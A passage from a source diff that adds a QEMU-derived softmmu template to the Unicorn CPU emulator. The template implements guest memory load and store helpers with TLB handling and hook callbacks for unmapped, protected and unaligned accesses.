env->tlb_v_table[mmu_idx][vidx]; \ + env->tlb_v_table[mmu_idx][vidx] = tmptlb; \ + tmpiotlb = env->iotlb[mmu_idx][index]; \ + env->iotlb[mmu_idx][index] = env->iotlb_v[mmu_idx][vidx]; \ + env->iotlb_v[mmu_idx][vidx] = tmpiotlb; \ + break; \ + } \ + } \ + /* return true when there is a vtlb hit, i.e. vidx >=0 */ \ + return (vidx >= 0) + +#ifndef victim_tlb_hit_funcs +#define victim_tlb_hit_funcs +static inline bool victim_tlb_hit_read(CPUArchState *env, target_ulong addr, int mmu_idx, int index) +{ + VICTIM_TLB_HIT(ADDR_READ); +} + +static inline bool victim_tlb_hit_write(CPUArchState *env, target_ulong addr, int mmu_idx, int index) +{ + VICTIM_TLB_HIT(addr_write); +} +#endif // victim_tlb_hit_funcs + +#ifndef SOFTMMU_CODE_ACCESS +static inline DATA_TYPE glue(io_read, SUFFIX)(CPUArchState *env, + hwaddr physaddr, + target_ulong addr, + uintptr_t retaddr) +{ + uint64_t val; + CPUState *cpu = ENV_GET_CPU(env); + MemoryRegion *mr = iotlb_to_region(cpu->as, physaddr); + + physaddr = (physaddr & TARGET_PAGE_MASK) + addr; + cpu->mem_io_pc = retaddr; + if (mr != &(cpu->uc->io_mem_rom) && mr != &(cpu->uc->io_mem_notdirty) + && !cpu_can_do_io(cpu)) { + cpu_io_recompile(cpu, retaddr); + } + + cpu->mem_io_vaddr = addr; + io_mem_read(mr, physaddr, &val, 1 << SHIFT); + return (DATA_TYPE)val; +} +#endif + +#ifdef SOFTMMU_CODE_ACCESS +static QEMU_UNUSED_FUNC +#endif +WORD_TYPE helper_le_ld_name(CPUArchState *env, target_ulong addr, int mmu_idx, + uintptr_t retaddr) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + target_ulong tlb_addr = env->tlb_table[mmu_idx][index].ADDR_READ; + uintptr_t haddr; + DATA_TYPE res; + int error_code; + struct hook *hook; + bool handled; + HOOK_FOREACH_VAR_DECLARE; + + struct uc_struct *uc = env->uc; + MemoryRegion *mr = memory_mapping(uc, addr); + + // memory might be still unmapped while reading or fetching + if (mr == NULL) { + handled = false; +#if defined(SOFTMMU_CODE_ACCESS) + error_code = UC_ERR_FETCH_UNMAPPED; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_UNMAPPED, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } +#else + error_code = UC_ERR_READ_UNMAPPED; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_UNMAPPED, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } +#endif + if (handled) { + env->invalid_error = UC_ERR_OK; + mr = memory_mapping(uc, addr); // FIXME: what if mr is still NULL at this time? + } else { + env->invalid_addr = addr; + env->invalid_error = error_code; + // printf("***** Invalid fetch (unmapped memory) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } + +#if defined(SOFTMMU_CODE_ACCESS) + // Unicorn: callback on fetch from NX + if (mr != NULL && !(mr->perms & UC_PROT_EXEC)) { // non-executable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_PROT, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_FETCH_PROT; + // printf("***** Invalid fetch (non-executable) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } +#endif + + // Unicorn: callback on memory read + // NOTE: this happens before the actual read, so we cannot tell + // the callback if read access is succesful, or not. + // See UC_HOOK_MEM_READ_AFTER & UC_MEM_READ_AFTER if you only care + // about successful read + if (READ_ACCESS_TYPE == MMU_DATA_LOAD) { + if (!uc->size_recur_mem) { // disabling read callback if in recursive call + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ, addr, DATA_SIZE, 0, hook->user_data); + } + } + } + + // Unicorn: callback on non-readable memory + if (READ_ACCESS_TYPE == MMU_DATA_LOAD && mr != NULL && !(mr->perms & UC_PROT_READ)) { //non-readable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_PROT, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_READ_PROT; + // printf("***** Invalid memory read (non-readable) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } + + /* Adjust the given return address. */ + retaddr -= GETPC_ADJ; + + /* If the TLB entry is for a different page, reload and try again. */ + /* If the TLB entry addend is invalidated by any callbacks (perhaps due to + a TLB flush), reload and try again. */ + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK)) + || env->tlb_table[mmu_idx][index].addend == -1) { +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; + } +#endif + if (!victim_tlb_hit_read(env, addr, mmu_idx, index)) { + tlb_fill(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + mmu_idx, retaddr); + } + tlb_addr = env->tlb_table[mmu_idx][index].ADDR_READ; + } + + /* Handle an IO access. */ + if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { + hwaddr ioaddr; + if ((addr & (DATA_SIZE - 1)) != 0) { + goto do_unaligned_access; + } + ioaddr = env->iotlb[mmu_idx][index]; + if (ioaddr == 0) { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_READ_UNMAPPED; + // printf("Invalid memory read at " TARGET_FMT_lx "\n", addr); + cpu_exit(env->uc->current_cpu); + return 0; + } else { + env->invalid_error = UC_ERR_OK; + } + + /* ??? Note that the io helpers always read data in the target + byte ordering. We should push the LE/BE request down into io. */ + res = glue(io_read, SUFFIX)(env, ioaddr, addr, retaddr); + res = TGT_LE(res); + goto _out; + } + + /* Handle slow unaligned access (it spans two pages or IO). */ + if (DATA_SIZE > 1 + && unlikely((addr & ~TARGET_PAGE_MASK) + DATA_SIZE - 1 + >= TARGET_PAGE_SIZE)) { + target_ulong addr1, addr2; + DATA_TYPE res1, res2; + unsigned shift; + do_unaligned_access: +#ifdef ALIGNED_ONLY + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; +#endif + addr1 = addr & ~(DATA_SIZE - 1); + addr2 = addr1 + DATA_SIZE; + /* Note the adjustment at the beginning of the function. + Undo that for the recursion. */ + uc->size_recur_mem = DATA_SIZE - (addr - addr1); // size already treated by callback + res1 = helper_le_ld_name(env, addr1, mmu_idx, retaddr + GETPC_ADJ); + uc->size_recur_mem = (addr2 - addr); + res2 = helper_le_ld_name(env, addr2, mmu_idx, retaddr + GETPC_ADJ); + uc->size_recur_mem = 0; + shift = (addr & (DATA_SIZE - 1)) * 8; + + /* Little-endian combine. */ + res = (res1 >> shift) | (res2 << ((DATA_SIZE * 8) - shift)); + goto _out; + } + + /* Handle aligned access or unaligned access in the same page. */ +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; + } +#endif + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); +#if DATA_SIZE == 1 + res = glue(glue(ld, LSUFFIX), _p)((uint8_t *)haddr); +#else + res = glue(glue(ld, LSUFFIX), _le_p)((uint8_t *)haddr); +#endif + +_out: + // Unicorn: callback on successful read + if (READ_ACCESS_TYPE == MMU_DATA_LOAD) { + if (!uc->size_recur_mem) { // disabling read callback if in recursive call + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_AFTER) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ_AFTER, addr, DATA_SIZE, res, hook->user_data); + } + } + } + + return res; +} + +#if DATA_SIZE > 1 +#ifdef SOFTMMU_CODE_ACCESS +static QEMU_UNUSED_FUNC +#endif +WORD_TYPE helper_be_ld_name(CPUArchState *env, target_ulong addr, int mmu_idx, + uintptr_t retaddr) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + target_ulong tlb_addr = env->tlb_table[mmu_idx][index].ADDR_READ; + uintptr_t haddr; + DATA_TYPE res; + int error_code; + struct hook *hook; + bool handled; + HOOK_FOREACH_VAR_DECLARE; + + struct uc_struct *uc = env->uc; + MemoryRegion *mr = memory_mapping(uc, addr); + + // memory can be unmapped while reading or fetching + if (mr == NULL) { + handled = false; +#if defined(SOFTMMU_CODE_ACCESS) + error_code = UC_ERR_FETCH_UNMAPPED; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_UNMAPPED, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } +#else + error_code = UC_ERR_READ_UNMAPPED; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_UNMAPPED, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } +#endif + if (handled) { + env->invalid_error = UC_ERR_OK; + mr = memory_mapping(uc, addr); // FIXME: what if mr is still NULL at this time? + } else { + env->invalid_addr = addr; + env->invalid_error = error_code; + // printf("***** Invalid fetch (unmapped memory) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } + +#if defined(SOFTMMU_CODE_ACCESS) + // Unicorn: callback on fetch from NX + if (mr != NULL && !(mr->perms & UC_PROT_EXEC)) { // non-executable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_PROT, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_FETCH_PROT; + // printf("***** Invalid fetch (non-executable) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } +#endif + + // Unicorn: callback on memory read + // NOTE: this happens before the actual read, so we cannot tell + // the callback if read access is succesful, or not. + // See UC_HOOK_MEM_READ_AFTER & UC_MEM_READ_AFTER if you only care + // about successful read + if (READ_ACCESS_TYPE == MMU_DATA_LOAD) { + if (!uc->size_recur_mem) { // disabling read callback if in recursive call + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ, addr, DATA_SIZE, 0, hook->user_data); + } + } + } + + // Unicorn: callback on non-readable memory + if (READ_ACCESS_TYPE == MMU_DATA_LOAD && mr != NULL && !(mr->perms & UC_PROT_READ)) { //non-readable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_PROT, addr, DATA_SIZE - uc->size_recur_mem, 0, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_READ_PROT; + // printf("***** Invalid memory read (non-readable) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return 0; + } + } + + /* Adjust the given return address. */ + retaddr -= GETPC_ADJ; + + /* If the TLB entry is for a different page, reload and try again. */ + /* If the TLB entry addend is invalidated by any callbacks (perhaps due to + a TLB flush), reload and try again. */ + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK)) + || env->tlb_table[mmu_idx][index].addend == -1) { +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; + } +#endif + if (!victim_tlb_hit_read(env, addr, mmu_idx, index)) { + tlb_fill(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + mmu_idx, retaddr); + } + tlb_addr = env->tlb_table[mmu_idx][index].ADDR_READ; + } + + /* Handle an IO access. */ + if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { + hwaddr ioaddr; + if ((addr & (DATA_SIZE - 1)) != 0) { + goto do_unaligned_access; + } + ioaddr = env->iotlb[mmu_idx][index]; + + if (ioaddr == 0) { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_READ_UNMAPPED; + // printf("Invalid memory read at " TARGET_FMT_lx "\n", addr); + cpu_exit(env->uc->current_cpu); + return 0; + } + + /* ??? Note that the io helpers always read data in the target + byte ordering. We should push the LE/BE request down into io. */ + res = glue(io_read, SUFFIX)(env, ioaddr, addr, retaddr); + res = TGT_BE(res); + goto _out; + } + + /* Handle slow unaligned access (it spans two pages or IO). */ + if (DATA_SIZE > 1 + && unlikely((addr & ~TARGET_PAGE_MASK) + DATA_SIZE - 1 + >= TARGET_PAGE_SIZE)) { + target_ulong addr1, addr2; + DATA_TYPE res1, res2; + unsigned shift; + do_unaligned_access: +#ifdef ALIGNED_ONLY + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; +#endif + addr1 = addr & ~(DATA_SIZE - 1); + addr2 = addr1 + DATA_SIZE; + /* Note the adjustment at the beginning of the function. + Undo that for the recursion. */ + uc->size_recur_mem = DATA_SIZE - (addr - addr1); // size already treated by callback + res1 = helper_be_ld_name(env, addr1, mmu_idx, retaddr + GETPC_ADJ); + uc->size_recur_mem = (addr2 - addr); + res2 = helper_be_ld_name(env, addr2, mmu_idx, retaddr + GETPC_ADJ); + uc->size_recur_mem = 0; + shift = (addr & (DATA_SIZE - 1)) * 8; + + /* Big-endian combine. */ + res = (res1 << shift) | (res2 >> ((DATA_SIZE * 8) - shift)); + goto _out; + } + + /* Handle aligned access or unaligned access in the same page. */ +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, READ_ACCESS_TYPE, + // mmu_idx, retaddr); + env->invalid_addr = addr; +#if defined(SOFTMMU_CODE_ACCESS) + env->invalid_error = UC_ERR_FETCH_UNALIGNED; +#else + env->invalid_error = UC_ERR_READ_UNALIGNED; +#endif + cpu_exit(uc->current_cpu); + return 0; + } +#endif + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); + res = glue(glue(ld, LSUFFIX), _be_p)((uint8_t *)haddr); + +_out: + // Unicorn: callback on successful read + if (READ_ACCESS_TYPE == MMU_DATA_LOAD) { + if (!uc->size_recur_mem) { // disabling read callback if in recursive call + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_AFTER) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ_AFTER, addr, DATA_SIZE, res, hook->user_data); + } + } + } + + return res; +} +#endif /* DATA_SIZE > 1 */ + +DATA_TYPE +glue(glue(helper_ld, SUFFIX), MMUSUFFIX)(CPUArchState *env, target_ulong addr, + int mmu_idx) +{ + return helper_te_ld_name (env, addr, mmu_idx, GETRA()); +} + +#ifndef SOFTMMU_CODE_ACCESS + +/* Provide signed versions of the load routines as well. We can of course + avoid this for 64-bit data, or for 32-bit data on 32-bit host. */ +#if DATA_SIZE * 8 < TCG_TARGET_REG_BITS +WORD_TYPE helper_le_lds_name(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr) +{ + return (SDATA_TYPE)helper_le_ld_name(env, addr, mmu_idx, retaddr); +} + +# if DATA_SIZE > 1 +WORD_TYPE helper_be_lds_name(CPUArchState *env, target_ulong addr, + int mmu_idx, uintptr_t retaddr) +{ + return (SDATA_TYPE)helper_be_ld_name(env, addr, mmu_idx, retaddr); +} +# endif +#endif + +static inline void glue(io_write, SUFFIX)(CPUArchState *env, + hwaddr physaddr, + DATA_TYPE val, + target_ulong addr, + uintptr_t retaddr) +{ + CPUState *cpu = ENV_GET_CPU(env); + MemoryRegion *mr = iotlb_to_region(cpu->as, physaddr); + + physaddr = (physaddr & TARGET_PAGE_MASK) + addr; + if (mr != &(cpu->uc->io_mem_rom) && mr != &(cpu->uc->io_mem_notdirty) + && !cpu_can_do_io(cpu)) { + cpu_io_recompile(cpu, retaddr); + } + + cpu->mem_io_vaddr = addr; + cpu->mem_io_pc = retaddr; + io_mem_write(mr, physaddr, val, 1 << SHIFT); +} + +void helper_le_st_name(CPUArchState *env, target_ulong addr, DATA_TYPE val, + int mmu_idx, uintptr_t retaddr) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + target_ulong tlb_addr = env->tlb_table[mmu_idx][index].addr_write; + uintptr_t haddr; + struct hook *hook; + bool handled; + HOOK_FOREACH_VAR_DECLARE; + + struct uc_struct *uc = env->uc; + MemoryRegion *mr = memory_mapping(uc, addr); + + if (!uc->size_recur_mem) { // disabling write callback if in recursive call + // Unicorn: callback on memory write + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(uc, UC_MEM_WRITE, addr, DATA_SIZE, val, hook->user_data); + } + } + + // Unicorn: callback on invalid memory + if (mr == NULL) { + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_UNMAPPED, addr, DATA_SIZE, val, hook->user_data))) + break; + } + + if (!handled) { + // save error & quit + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNMAPPED; + // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return; + } else { + env->invalid_error = UC_ERR_OK; + mr = memory_mapping(uc, addr); // FIXME: what if mr is still NULL at this time? + } + } + + // Unicorn: callback on non-writable memory + if (mr != NULL && !(mr->perms & UC_PROT_WRITE)) { //non-writable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_PROT, addr, DATA_SIZE, val, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_PROT; + // printf("***** Invalid memory write (ro) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return; + } + } + + /* Adjust the given return address. */ + retaddr -= GETPC_ADJ; + + /* If the TLB entry is for a different page, reload and try again. */ + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK))) { +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + //cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + // mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; + } +#endif + if (!victim_tlb_hit_write(env, addr, mmu_idx, index)) { + tlb_fill(ENV_GET_CPU(env), addr, MMU_DATA_STORE, mmu_idx, retaddr); + } + tlb_addr = env->tlb_table[mmu_idx][index].addr_write; + } + + /* Handle an IO access. */ + if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { + hwaddr ioaddr; + if ((addr & (DATA_SIZE - 1)) != 0) { + goto do_unaligned_access; + } + ioaddr = env->iotlb[mmu_idx][index]; + if (ioaddr == 0) { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNMAPPED; + // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); + cpu_exit(env->uc->current_cpu); + return; + } + + /* ??? Note that the io helpers always read data in the target + byte ordering. We should push the LE/BE request down into io. */ + val = TGT_LE(val); + glue(io_write, SUFFIX)(env, ioaddr, val, addr, retaddr); + return; + } + + /* Handle slow unaligned access (it spans two pages or IO). */ + if (DATA_SIZE > 1 + && unlikely((addr & ~TARGET_PAGE_MASK) + DATA_SIZE - 1 + >= TARGET_PAGE_SIZE)) { + int i; + do_unaligned_access: +#ifdef ALIGNED_ONLY + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; +#endif + /* XXX: not efficient, but simple */ + /* Note: relies on the fact that tlb_fill() does not remove the + * previous page from the TLB cache. */ + for (i = DATA_SIZE - 1; i >= 0; i--) { + /* Little-endian extract. */ + uint8_t val8 = (uint8_t)(val >> (i * 8)); + // size already treated, this is used only for diabling the write cb + uc->size_recur_mem = DATA_SIZE - i ; + /* Note the adjustment at the beginning of the function. + Undo that for the recursion. */ + glue(helper_ret_stb, MMUSUFFIX)(env, addr + i, val8, + mmu_idx, retaddr + GETPC_ADJ); + if (env->invalid_error != UC_ERR_OK) + break; + } + uc->size_recur_mem = 0; + return; + } + + /* Handle aligned access or unaligned access in the same page. */ +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; + } +#endif + + haddr = (uintptr_t)(addr + env->tlb_table[mmu_idx][index].addend); +#if DATA_SIZE == 1 + glue(glue(st, SUFFIX), _p)((uint8_t *)haddr, val); +#else + glue(glue(st, SUFFIX), _le_p)((uint8_t *)haddr, val); +#endif +} + +#if DATA_SIZE > 1 +void helper_be_st_name(CPUArchState *env, target_ulong addr, DATA_TYPE val, + int mmu_idx, uintptr_t retaddr) +{ + int index = (addr >> TARGET_PAGE_BITS) & (CPU_TLB_SIZE - 1); + target_ulong tlb_addr = env->tlb_table[mmu_idx][index].addr_write; + uintptr_t haddr; + struct hook *hook; + bool handled; + HOOK_FOREACH_VAR_DECLARE; + + struct uc_struct *uc = env->uc; + MemoryRegion *mr = memory_mapping(uc, addr); + + if (!uc->size_recur_mem) { // disabling write callback if in recursive call + // Unicorn: callback on memory write + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + ((uc_cb_hookmem_t)hook->callback)(uc, UC_MEM_WRITE, addr, DATA_SIZE, val, hook->user_data); + } + } + + // Unicorn: callback on invalid memory + if (mr == NULL) { + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_UNMAPPED) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_UNMAPPED, addr, DATA_SIZE, val, hook->user_data))) + break; + } + + if (!handled) { + // save error & quit + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNMAPPED; + // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return; + } else { + env->invalid_error = UC_ERR_OK; + mr = memory_mapping(uc, addr); // FIXME: what if mr is still NULL at this time? + } + } + + // Unicorn: callback on non-writable memory + if (mr != NULL && !(mr->perms & UC_PROT_WRITE)) { //non-writable + handled = false; + HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_PROT) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, addr)) + continue; + if ((handled = ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_PROT, addr, DATA_SIZE, val, hook->user_data))) + break; + } + + if (handled) { + env->invalid_error = UC_ERR_OK; + } else { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_PROT; + // printf("***** Invalid memory write (ro) at " TARGET_FMT_lx "\n", addr); + cpu_exit(uc->current_cpu); + return; + } + } + + /* Adjust the given return address. */ + retaddr -= GETPC_ADJ; + + /* If the TLB entry is for a different page, reload and try again. */ + if ((addr & TARGET_PAGE_MASK) + != (tlb_addr & (TARGET_PAGE_MASK | TLB_INVALID_MASK))) { +#ifdef ALIGNED_ONLY + if ((addr & (DATA_SIZE - 1)) != 0) { + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; + } +#endif + if (!victim_tlb_hit_write(env, addr, mmu_idx, index)) { + tlb_fill(ENV_GET_CPU(env), addr, MMU_DATA_STORE, mmu_idx, retaddr); + } + tlb_addr = env->tlb_table[mmu_idx][index].addr_write; + } + + /* Handle an IO access. */ + if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { + hwaddr ioaddr; + if ((addr & (DATA_SIZE - 1)) != 0) { + goto do_unaligned_access; + } + ioaddr = env->iotlb[mmu_idx][index]; + if (ioaddr == 0) { + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNMAPPED; + // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); + cpu_exit(env->uc->current_cpu); + return; + } + + /* ??? Note that the io helpers always read data in the target + byte ordering. We should push the LE/BE request down into io. */ + val = TGT_BE(val); + glue(io_write, SUFFIX)(env, ioaddr, val, addr, retaddr); + return; + } + + /* Handle slow unaligned access (it spans two pages or IO). */ + if (DATA_SIZE > 1 + && unlikely((addr & ~TARGET_PAGE_MASK) + DATA_SIZE - 1 + >= TARGET_PAGE_SIZE)) { + int i; + do_unaligned_access: +#ifdef ALIGNED_ONLY + cpu_unaligned_access(ENV_GET_CPU(env), addr, MMU_DATA_STORE, + mmu_idx, retaddr); + env->invalid_addr = addr; + env->invalid_error = UC_ERR_WRITE_UNALIGNED; + cpu_exit(uc->current_cpu); + return; +#endif + /* XXX: not efficient, but simple */ + /* Note: relies on the fact that tlb_fill() does not remove the + * previous page from the TLB cache. */ + for (i = DATA_SIZE - 1; i >= 0; i--) { + /* Big-endian extract. */ + uint8_t val8 = (uint8_t)(val >> (((DATA_SIZE - 1) * 8) - (i * 8))); + // size already treated, this is used only for diabling the write cb + uc->size_recur_mem = DATA_SIZE - i ; + /* Note the adjustment at the beginning of the function. + Undo that for the recursion. */ + glue(helper_ret_stb, 